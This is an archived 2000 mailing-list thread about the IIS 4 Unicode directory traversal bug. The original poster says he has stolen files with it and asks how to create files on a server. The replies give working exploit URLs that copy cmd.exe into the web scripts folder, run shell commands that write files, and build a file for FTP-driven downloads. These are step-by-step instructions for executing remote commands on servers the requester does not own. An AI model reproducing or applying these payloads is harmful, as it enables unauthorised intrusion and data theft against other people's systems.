Vulnerability Development mailing list archives
Re: dos commands via iis 4
From: Unicraft Systems <unicraft () OTERO CL>
Date: Fri, 10 Nov 2000 12:05:21 -0300
However... If your are building a text file to make use of an FTP command with the -s option... the string should be this way http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack
file.txt
Leaving a space (using a +) between the text and the ">" will cause the FTP command not to function when it retrieves the information from the file. My $0.02 Regards, Gabriel Aguilera -----Original Message----- From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of [ K o S a K ] Sent: Thursday, November 09, 2000 10:21 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Re: dos commands via iis 4 To create a file : First copy \winnt\system32\cmd.exe in /inetpub/scripts/ http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..\..\wi nnt\system32\cmd.exe+cmd2.exe Then Run : http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack +>file.txt now dir, your file is created. [ KoSaK ] ----- Original Message ----- From: "booboo" <booboo () 65535 COM> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Thursday, November 09, 2000 12:21 PM Subject: dos commands via iis 4
Dear Guys, I have been playing around with the latest iis unicode bug using the ..%c0%af.. strings and have had some success. I have been able to get directory listings of all the drives, lists of users and shares and steal files etc.. However, I have not been able to create files. I have been trying to use 'type'with re-directs but it does not seem to like the re-direct symbols. I have tried in quotation marks and using hex but no luck. Does anyone know how to do it.. or has an alternative.. This is just for testing. Any help appreciated. BooBoo
Current thread:
- dos commands via iis 4 booboo (Nov 10)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Nikolaou, Dinos (Nov 11)
- Re: dos commands via iis 4 Bluefish (P.Magnusson) (Nov 23)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Robert A. Seace (Nov 11)
- Re: dos commands via iis 4 booboo (Nov 15)
- <Possible follow-ups>
- Re: dos commands via iis 4 Unicraft Systems (Nov 11)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)